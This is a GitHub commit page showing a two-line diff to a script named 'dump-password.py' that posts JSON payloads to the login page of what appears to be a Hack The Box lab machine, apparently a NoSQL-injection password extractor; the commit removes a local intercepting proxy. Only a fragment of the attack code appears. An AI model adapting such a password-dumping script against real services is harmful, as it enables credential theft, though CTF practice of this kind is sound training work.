Skip to content

Commit 378da1a

Browse files
authored
Update dump-password.py
Removed proxies as not in original script
1 parent 9db410d commit 378da1a

File tree

1 file changed

+1
-2
lines changed

1 file changed

+1
-2
lines changed

nosql/dump-password.py

+1-2
Original file line numberDiff line numberDiff line change
@@ -6,9 +6,8 @@
66
import string
77

88
def test_login(payload):
9-
proxies={"http":"http://127.0.0.1:8080"}
109
url = 'http://dev.stocker.htb/login'
11-
r = requests.post(url, json=payload, proxies=proxies)
10+
r = requests.post(url, json=payload)
1211
r.raise_for_status()
1312
if "error" in r.text:
1413
return False

0 commit comments

Comments
 (0)